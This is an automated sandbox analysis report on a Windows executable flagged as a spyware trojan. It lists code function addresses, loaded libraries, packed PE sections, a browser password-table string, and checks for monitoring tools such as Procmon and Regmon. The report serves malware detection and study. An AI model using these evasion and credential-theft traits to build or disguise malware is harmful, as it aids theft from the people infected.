                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D58D51_2_009D58D5
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CB1001_2_009CB100
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F92801_2_009F9280
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E3B501_2_009E3B50
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009ED34A1_2_009ED34A
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A004601_2_00A00460
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E74401_2_009E7440
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FC5A01_2_009FC5A0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A00D201_2_00A00D20
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E1D001_2_009E1D00
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CE6871_2_009CE687
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F8EA01_2_009F8EA0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C86001_2_009C8600
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CCE451_2_009CCE45
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E2E6D1_2_009E2E6D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D27501_2_009D2750
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EC09E1_2_009EC09E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F88B01_2_009F88B0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DC8A01_2_009DC8A0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F38D01_2_009F38D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EA0CA1_2_009EA0CA
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DB8F61_2_009DB8F6
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D60E91_2_009D60E9
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EC0E61_2_009EC0E6
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DD0031_2_009DD003
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CD83C1_2_009CD83C
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CD0211_2_009CD021
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CC8401_2_009CC840
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FF18B1_2_009FF18B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EE1801_2_009EE180
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E39B91_2_009E39B9
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E91AE1_2_009E91AE
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A009E01_2_00A009E0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E81CC1_2_009E81CC
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EC9EB1_2_009EC9EB
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E69101_2_009E6910
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C59011_2_009C5901
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EC09E1_2_009EC09E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C397B1_2_009C397B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D81691_2_009D8169
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C61601_2_009C6160
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DE9601_2_009DE960
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F9A801_2_009F9A80
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E8ABC1_2_009E8ABC
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D9AD01_2_009D9AD0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E42D01_2_009E42D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D0ACC1_2_009D0ACC
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DE2201_2_009DE220
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F5A4F1_2_009F5A4F
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FDA4D1_2_009FDA4D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FCA401_2_009FCA40
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C42701_2_009C4270
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DEB801_2_009DEB80
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EF3801_2_009EF380
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E83D81_2_009E83D8
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C73D01_2_009C73D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CF3C01_2_009CF3C0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D8B1B1_2_009D8B1B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C93101_2_009C9310
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CAB401_2_009CAB40
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E13401_2_009E1340
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D4CA01_2_009D4CA0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E04C61_2_009E04C6
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CD4F31_2_009CD4F3
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F1CF01_2_009F1CF0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E24E01_2_009E24E0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F3C101_2_009F3C10
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FA4401_2_009FA440
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D747D1_2_009D747D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F7DA91_2_009F7DA9
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FA5D41_2_009FA5D4
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C5DC01_2_009C5DC0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FCDF01_2_009FCDF0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D051B1_2_009D051B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EC53C1_2_009EC53C
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F9D301_2_009F9D30
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E6D2E1_2_009E6D2E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D1D2B1_2_009D1D2B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009ECD5E1_2_009ECD5E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009ECD4C1_2_009ECD4C
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FFD701_2_009FFD70
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E45601_2_009E4560
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DAEB01_2_009DAEB0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E46D01_2_009E46D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A006F01_2_00A006F0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D961B1_2_009D961B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CF60D1_2_009CF60D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FFE001_2_009FFE00
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DE6301_2_009DE630
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F86501_2_009F8650
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EFE7D1_2_009EFE7D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E0E6C1_2_009E0E6C
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EEE6C1_2_009EEE6C
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C97801_2_009C9780
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E5F1B1_2_009E5F1B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E97391_2_009E9739
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D6F521_2_009D6F52
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E77401_2_009E7740
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: String function: 009C7F60 appears 40 times
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: String function: 009D4C90 appears 77 times
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 2028
                Source: fnCae9FQhg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: fnCae9FQhg.exeStatic PE information: Section: ZLIB complexity 0.9995595894607843
                Source: fnCae9FQhg.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F2070 CoCreateInstance,1_2_009F2070
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess404
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\2ce9e3dd-6a4c-4845-b0b4-71bb2cdbfa53Jump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: fnCae9FQhg.exe, 00000001.00000003.2283599646.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2259052080.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2259612391.00000000057DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: fnCae9FQhg.exeReversingLabs: Detection: 47%
                Source: fnCae9FQhg.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: fnCae9FQhg.exeString found in binary or memory: qRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeVPR
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile read: C:\Users\user\Desktop\fnCae9FQhg.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\fnCae9FQhg.exe "C:\Users\user\Desktop\fnCae9FQhg.exe"
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 2028
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: fnCae9FQhg.exeStatic file information: File size 2960384 > 1048576
                Source: fnCae9FQhg.exeStatic PE information: Raw size of audsrymt is bigger than: 0x100000 < 0x2a9000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeUnpacked PE file: 1.2.fnCae9FQhg.exe.9c0000.0.unpack :EW;.rsrc :W;.idata :W;audsrymt:EW;ilsizkav:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;audsrymt:EW;ilsizkav:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: fnCae9FQhg.exeStatic PE information: real checksum: 0x2e1076 should be: 0x2d8bc4
                Source: fnCae9FQhg.exeStatic PE information: section name:
                Source: fnCae9FQhg.exeStatic PE information: section name: .rsrc
                Source: fnCae9FQhg.exeStatic PE information: section name: .idata
                Source: fnCae9FQhg.exeStatic PE information: section name: audsrymt
                Source: fnCae9FQhg.exeStatic PE information: section name: ilsizkav
                Source: fnCae9FQhg.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057DE632 push ss; iretd 1_3_057DE633
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D5322 push ds; iretd 1_3_057D5327
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D5322 push ds; iretd 1_3_057D5327
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057DDB98 pushad ; ret 1_3_057DDB99
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057DE632 push ss; iretd 1_3_057DE633
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D5322 push ds; iretd 1_3_057D5327
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D5322 push ds; iretd 1_3_057D5327
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057DDB98 pushad ; ret 1_3_057DDB99
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F7069 push es; retf 1_2_009F7074
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FC990 push eax; mov dword ptr [esp], 5C5D5E5Fh1_2_009FC99E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A171EC push esi; mov dword ptr [esp], ebp1_2_00A177FB
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A17134 push 6F15F51Bh; mov dword ptr [esp], esi1_2_00A17599
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A17151 push ebx; mov dword ptr [esp], 37DC4D17h1_2_00A172B4
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A1715F push 1EB461E2h; mov dword ptr [esp], ecx1_2_00A1716A
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A1724F push edx; mov dword ptr [esp], ecx1_2_00A17250
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A03BF7 push ebp; ret 1_2_00A03BFE
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DB324 push F3B900A0h; retf 1_2_009DB32A
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A03C01 push ebp; ret 1_2_00A03C02
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A03C05 push ebp; ret 1_2_00A03C06
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A03C09 push ebp; ret 1_2_00A03C0A
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A17411 push ebp; mov dword ptr [esp], ecx1_2_00A17416
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A16D9A push edx; retf 1_2_00A16D9B
                Source: fnCae9FQhg.exeStatic PE information: section name: entropy: 7.982075034799655

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
